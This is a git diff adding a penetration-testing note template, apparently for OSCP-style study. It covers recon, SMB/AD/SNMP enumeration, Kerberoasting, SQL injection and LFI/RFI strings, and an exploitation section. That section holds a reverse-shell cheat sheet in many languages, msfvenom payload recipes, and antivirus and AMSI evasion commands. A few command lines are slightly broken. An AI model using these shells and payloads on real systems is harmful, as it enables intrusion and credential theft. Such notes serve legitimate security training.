diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..d51d5fa
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,2 @@
+# Ignore Obsidian Files
+*.obsidian
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md
new file mode 100644
index 0000000..f64e09f
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md
@@ -0,0 +1,100 @@
+# "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to"
+
+
+## tcpdump:
+
+- tcpdump -i eth0
+- tcpdump -c -i eth0
+- tcpdump -A -i eth0
+- tcpdump -w 0001.pcap -i eth0
+- tcpdump -r 0001.pcap
+- tcpdump -n -i eth0
+- tcpdump -i eth0 port 22
+- tcpdump -i eth0 -src 172.21.10.X
+- tcpdump -i eth0 -dst 172.21.10.X
+
+Other tools:
+
+Tshark (Command Line Wireshark)
+Wireshark
+
+
+## Network Scanning
+
+NetDiscover (ARP Scanning):
+- netdiscover -i eth0
+- netdiscover -r 172.21.10.0/24
+
+Nmap:
+
+- nmap -sn 172.21.10.0/24
+- nmap -sn 172.21.10.1-253
+- nmap -sn 172.21.10.*
+
+Nbtscan:
+- nbtscan -r 172.21.1.0/24
+
+Linux Ping Sweep (Bash)
+
+- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done
+
+Windows Ping Sweep (Run on Windows System)
+
+- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up.
+
+
+
+## Host Scanning
+
+Nmap:
+
+- nmap -sC -sV 172.21.0.0
+- nmap -sV -Pn 172.21.0.0
+- nmap -T4 -sC -sV 172.21.0.0
+- nmap -A 172.21.0.0
+
+IPv6 Scan:
+
+Nmap Scripts:
+
+Location: /usr/share/nmap/scripts/
+
+- nmap --scripts vuln,safe,discovery -oN results.txt target-ip
+
+Scans through Socks proxy:
+
+- nmap --proxies socks4://proxy-ip:8080 target-ip
+
+DNSRecon:
+
+- dnsrecon -d www.example.com -a
+- dnsrecon -d www.example.com -t axfr
+- dnsrecon -d
+- dnsrecon -d www.example.com -D -t brt
+
+Dig:
+
+- dig www.example.com + short
+- dig www.example.com MX
+- dig www.example.com NS
+- dig www.example.com> SOA
+- dig www.example.com ANY +noall +answer
+- dig -x www.example.com
+- dig -4 www.example.com (For IPv4)
+- dig -6 www.example.com (For IPv6)
+- dig www.example.com mx +noall +answer example.com ns +noall +answer
+- dig -t AXFR www.example.com
+
+Sublis3r:
+
+- Sublist3r -d www.example.com
+- Sublist3r -v -d www.example.com -p 80,443
+
+OWASP AMASS:
+
+- amass enum -d www.example.com
+- amass intel -whois -d www.example.com
+- amass intel -active 172.21.0.0-64 -p 
80,443,8080,8443
+- amass intel -ipv4 -whois -d www.example.com
+- amass intel -ipv6 -whois -d www.example.com
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md
new file mode 100644
index 0000000..9aaf438
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md
@@ -0,0 +1,6 @@
+# Fill in results or other information about your target here:
+
+
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md
new file mode 100644
index 0000000..ed34651
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md
@@ -0,0 +1,6 @@
+# When in Doubt...Always Enumerate! Enumeration is the key!
+
+
+
+## Resources
+- http://www.0daysecurity.com/penetration-testing/enumeration.html
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md
new file mode 100644
index 0000000..cdcb8b7
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md
@@ -0,0 +1,12 @@
+## In Kali
+
+apt install impacket-scripts
+
+## Github
+
+https://github.com/SecureAuthCorp/impacket
+
+## Local Locations:
+
+/usr/share/doc/python3-impacket/examples
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket Kerberoasting.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket Kerberoasting.md
new file mode 100644
index 0000000..f12888f
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket Kerberoasting.md
@@ -0,0 +1,24 @@
+## Check for Kerberoasting:
+
+- GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip -format hashcat/john
+
+## GetUserSPNs
+
+ASREPRoast:
+- impacket-GetUserSPNs /: -request -format -outputfile
+- impacket-GetUserSPNs / -usersfile -format -outputfile
+
+Kerberoasting:
+- impacket-GetUserSPNs /: -outputfile
+
+Overpass The Hash/Pass The Key (PTK):
+- python3 getTGT.py / -hashes [lm_hash]:
+- python3 getTGT.py / -aesKey
+- python3 getTGT.py /:[password]
+
+## Using TGT key to excute remote commands from the following impacket scripts:
+
+- python3 psexec.py /@ -k -no-pass
+- python3 smbexec.py /@ -k -no-pass
+- python3 wmiexec.py /@ -k -no-pass
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md
new file mode 100644
index 0000000..48c6d82
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md
@@ -0,0 +1,23 @@
+Cannot use in the OSCP Exam. Fun to use on assessments.
+Note: Multirelay.py does not work in python3 since the UserDict library has been depricated
+
+
+# Source: https://github.com/lgandx/Responder
+
+## Make changes to config to turn off services:
+
+nano /usr/share/responder/Responder.conf
+
+## Starting Responder:
+
+- responder -I [Interface] -A
+- responder -I [Interface] -i [IP Address] or -e [External IP] -A
+
+## Tools in Responder:
+
+Location: /usr/share/Responder/tools
+
+## Check for systems with SMB Signing not enabled
+
+- python3 RunFinger.py -i 172.21.0.0/24
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md
new file mode 100644
index 0000000..126fa59
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md 
@@ -0,0 +1,102 @@
+
+## Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!
+
+
+## Web App Scanners
+
+Nikto:
+
+- nikto --url
+
+Wpscan:
+
+- wpscan --url
+- wpscan --url --enumerate ap at (All Plugins, All Themes)
+- wpscan --url --enumerate u (Usernames)
+- wpscan --url --enumerate v
+
+Web Tools for Directory Scanning:
+
+Dirb:
+
+- dirb
+- dirb
+
+Gobuster:
+
+- gobuster -u -w /usr/share/wordlists/
+- gobuster -u -w /usr/share/wordlists/ -a Firefox (Custom Agent)
+- gobuster -u -w /usr/share/wordlists/ -x .php,.txt,.html
+- gobuster -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
+- gobuster -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
+- gobuster -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
+- gobuster -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" -o output.txt
+- gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
+
+Wfuzz:
+
+- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
+- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
+- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)
+
+- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)
+
+Dirsearch:
+
+- dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php
+
+
+Other Tools:
+- Burp Suite
+- OWASP Zap
+- Cadaver
+- SQLMap
+- Joomscan
+
+
+## Testing for LFI:
+
+https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf
+
+Examples:
+
+http://example.com/index.php?page=etc/passwd
+http://example.com/index.php?page=etc/passwd%00
+http://example.com/index.php?page=../../etc/passwd
+http://example.com/index.php?page=%252e%252e%252f
+http://example.com/index.php?page=....//....//etc/passwd
+
+Interesting Files:
+
+Linux:
+/etc/passwd
+/etc/shadow
+/etc/issue
+/etc/group
+/etc/hostname
+/etc/ssh/ssh_config
+/etc/ssh/sshd_config
+/root/.ssh/id_rsa
+/root/.ssh/authorized_keys
+/home/user/.ssh/authorized_keys
+/home/user/.ssh/id_rsa
+
+Windows:
+
+Windows:
+/boot.ini
+/autoexec.bat
+/windows/system32/drivers/etc/hosts
+/windows/repair/SAM
+
+
+
+## Testing for RFI:
+
+http://example.com/index.php?page=http://callback.com/shell.txt
+http://example.com/index.php?page=http://callback.com/shell.txt%00
+http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt
+
+## Resources
+
+- Turning LFI to RFI: https://l.avala.mp/?p=241
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md
new file mode 100644
index 0000000..cc7d1db
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md
@@ -0,0 +1,25 @@
+Testing for Bypasses:
+
+' or 1=1 LIMIT 1 --
+' or 1=1 LIMIT 1 -- -
+' or 1=1 LIMIT 1#
+'or 1#
+' or 1=1 --
+' or 1=1 -- -
+
+# SQLMAP
+
+## sqlmap crawl
+sqlmap -u http://172.21.0.0 --crawl=1
+
+## sqlmap dump database
+sqlmap -u http://172.21.0.0 --dbms=mysql --dump
+
+## sqlmap shell
+sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell
+
+# SQLI
+
+Testing for a row:
+
+- http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md
new file mode 100644
index 0000000..ffc452e
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md
@@ -0,0 +1,63 @@
+
+## Enumerate SMB:
+
+Enum4linux:
+
+- Enum4linux -a 172.21.0.0
+
+SMBmap:
+
+- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
+- smbmap -H 172.21.0.0 -d [domain] -u "" -p ""
+
+Nmap:
+
+- nmap --script smb-* -p 139,445, 172.21.0.0
+- nmap --script smb-enum-* -p 139,445, 172.21.0.0
+
+/usr/share/nmap/scripts/smb-brute.nse
+/usr/share/nmap/scripts/smb-enum-domains.nse
+/usr/share/nmap/scripts/smb-enum-groups.nse
+/usr/share/nmap/scripts/smb-enum-processes.nse
+/usr/share/nmap/scripts/smb-enum-services.nse
+/usr/share/nmap/scripts/smb-enum-sessions.nse
+/usr/share/nmap/scripts/smb-enum-shares.nse
+/usr/share/nmap/scripts/smb-enum-users.nse
+/usr/share/nmap/scripts/smb-flood.nse
+/usr/share/nmap/scripts/smb-ls.nse
+/usr/share/nmap/scripts/smb-mbenum.nse
+/usr/share/nmap/scripts/smb-os-discovery.nse
+/usr/share/nmap/scripts/smb-print-text.nse
+/usr/share/nmap/scripts/smb-protocols.nse
+/usr/share/nmap/scripts/smb-psexec.nse
+/usr/share/nmap/scripts/smb-security-mode.nse
+/usr/share/nmap/scripts/smb-server-stats.nse
+/usr/share/nmap/scripts/smb-system-info.nse
+
+
+SMBClient:
+
+- smbclient -L 172.21.0.0
+- smbclient //172.21.0.0/tmp
+
+Impacket SmbClient:
+
+- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0
+
+RPCclient:
+
+- rpcclient -U "" -N 172.21.0.0 enumdomusers
+
+Impacket:
+
+- python3 samdump.py SMB 172.21.0.0
+
+CrackMapExec:
+
+- crackmapexec smb -L
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share
+- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md
new file mode 100644
index 0000000..820d180
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md
@@ -0,0 +1,24 @@
+# Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy.
+
+
+Anonymous Credential LDAP Dumping:
+
+- ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’
+
+Impacket GetADUsers.py (Must have valid credentials)
+
+- GetADUsers.py -all -dc-ip
+
+Impacket lookupsid.py:
+
+- /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0
+
+Windapsearch:
+
+https://github.com/ropnop/windapsearch
+
+- python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
+
+## References:
+
+- PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/General Notes.md
new file mode 100644
index 0000000..5ba634a
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/General Notes.md
@@ -0,0 +1,57 @@
+SNMP Walk:
+
+
+- snmpwalk -c public -v1 ipaddress 1
+- snmpwalk -c private -v1 ipaddress 1
+- snmpwalk -c manager -v1 ipaddress 1
+
+
+Nmap:
+
+- nmap 172.21.0.0 -Pn -sU -p 161 --script=
+
+/usr/share/nmap/scripts/snmp-brute.nse
+/usr/share/nmap/scripts/snmp-hh3c-logins.nse
+/usr/share/nmap/scripts/snmp-info.nse
+/usr/share/nmap/scripts/snmp-interfaces.nse
+/usr/share/nmap/scripts/snmp-ios-config.nse
+/usr/share/nmap/scripts/snmp-netstat.nse
+/usr/share/nmap/scripts/snmp-processes.nse
+/usr/share/nmap/scripts/snmp-sysdescr.nse
+/usr/share/nmap/scripts/snmp-win32-services.nse
+/usr/share/nmap/scripts/snmp-win32-shares.nse
+/usr/share/nmap/scripts/snmp-win32-software.nse
+/usr/share/nmap/scripts/snmp-win32-users.nse
+
+Metasploit aux modules:
+
+ auxiliary/scanner/misc/oki_scanner
+ auxiliary/scanner/snmp/aix_version
+ auxiliary/scanner/snmp/arris_dg950
+ auxiliary/scanner/snmp/brocade_enumhash
+ auxiliary/scanner/snmp/cisco_config_tftp
+ auxiliary/scanner/snmp/cisco_upload_file
+ auxiliary/scanner/snmp/cnpilot_r_snmp_loot
+ auxiliary/scanner/snmp/epmp1000_snmp_loot
+ auxiliary/scanner/snmp/netopia_enum
+ auxiliary/scanner/snmp/sbg6580_enum
+ auxiliary/scanner/snmp/snmp_enum
+ auxiliary/scanner/snmp/snmp_enum_hp_laserjet
+ auxiliary/scanner/snmp/snmp_enumshares
+ auxiliary/scanner/snmp/snmp_enumusers
+ auxiliary/scanner/snmp/snmp_login
+
+
+Onesixtyone:
+
+- onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X
+
+Snmp-check
+
+
+- snmp-check 172.21.0.0 -c public
+
+
+Impacket:
+
+- python3 samdump.py SNMP 172.21.0.0
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/5. TCP/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/5. TCP/Target _1.md
new file mode 100644
index 0000000..9aaf438
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/5. TCP/Target _1.md
@@ -0,0 +1,6 @@
+# Fill in results or other information about your target here:
+
+
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/6. UDP/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/6. UDP/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/6. UDP/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/7. Other/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/7. Other/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/7. Other/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/1. General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/1. General Notes.md
new file mode 100644
index 0000000..689467c
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/1. General Notes.md
@@ -0,0 +1,77 @@
+## Pre-requisites for runninging exploits
+
+- Check the version of the operating system.
+- Check the software version.
+- Check if there is exploit for it (Searchsploit, ExploitDB, Google, etc).
+- If you have an exploit, is there a Metasploit Module for it?
+
+
+## Default Credentials
+
+- https://cirt.net/passwords
+- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
+
+## Reverse Shells
+
+Bash:
+
+- bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1
+
+Perl:
+
+```
+perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+```
+
+Python:
+
+- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+IPv6:
+
+- python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
+
+Ruby:
+
+- ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
+- ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+
+
+PHP:
+
+Pentest Monkey Reverse Shell for PHP:
+In Kali:
+
+/usr/share/webshells/php/php-reverse-shell.php
+
+Link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
+
+- php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
+
+Powershell:
+
+```
+$callback = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName 
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$callback.Close()
+```
+
+Golang:
+
+- echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
+
+AWK:
+
+- awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
+
+
+Other Reverse Shell:
+https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
+
+
+## Other Resources:
+
+- Amsi-Bypass-Powershell: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
+
+
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypass Windows Amsi.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypass Windows Amsi.md
new file mode 100644
index 0000000..4c66979
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypass Windows Amsi.md
@@ -0,0 +1,14 @@
+## Testing for Amsi Bypass:
+
+- https://github.com/rasta-mouse/AmsiScanBufferBypass
+
+## Amsi-Bypass-Powershell
+
+- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
+
+## Resources:
+
+- https://blog.f-secure.com/hunting-for-amsi-bypasses/
+- https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+- https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
+- https://slaeryan.github.io/posts/falcon-zero-alpha.html
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypassing AV.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypassing AV.md
new file mode 100644
index 0000000..b773a87
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypassing AV.md
@@ -0,0 +1,39 @@
+## Veil Framework:
+
+Install on Kali:
+- apt install veil
+- /usr/share/veil/config/setup.sh --force --silent
+
+Reference: https://github.com/Veil-Framework/Veil
+
+## Shellter
+
+Source: https://www.shellterproject.com/download/
+
+- apt install shellter
+
+
+## Sharpshooter
+
+Javascript Payload Stageless:
+- SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
+
+Stageless HTA Payload:
+
+- SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
+
+Staged VBS:
+
+- SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
+
+Reference: https://github.com/mdsecactivebreach/SharpShooter
+
+## Donut:
+
+Source: https://github.com/TheWover/donut
+
+## Vulcan
+
+Source: https://github.com/praetorian-code/vulcan
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Msfvenom.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Msfvenom.md
new file mode 100644
index 0000000..f758318
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Msfvenom.md
@@ -0,0 +1,86 @@
+## Creating a payload
+
+- msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]
+
+To view list of payloads: msfvenom -l payloads
+To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options
+
+## Creating a payload with encoding
+
+- msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile
+
+## Creating a payload using a template
+
+- msfvenom -p [payload] -x [template] -f [formattype] > outputfile
+
+## Listening for MSfvenom Payloads:
+
+```
+msf5>use exploit/multi/handler
+msf5>set payload windows/meterpreter/reverse_tcp
+msf5>set lhost
+msf5>set lport
+msf5> set ExitOnSession false
+msf5>exploit -j
+```
+
+## Windows Payloads
+
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
+- msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe
+- msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe
+- msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
+- msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
+
+## Linux Payloads
+
+- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
+- msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
+- msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
+- msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
+
+Add a user in windows with msfvenom:
+
+- msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe
+
+## Web Payloads
+
+PHP
+
+- msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
+cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
+
+ASP
+
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 
asp > shell.asp
+
+JSP
+
+- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
+
+WAR
+
+- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
+
+## Scripting Payloads
+
+Python
+
+- msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
+
+Bash
+
+- msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
+
+Perl
+
+- msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
+
+
+Creating an Msfvenom Payload with an encoder while removing bad charecters:
+
+- msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"
+
+## Resources:
+
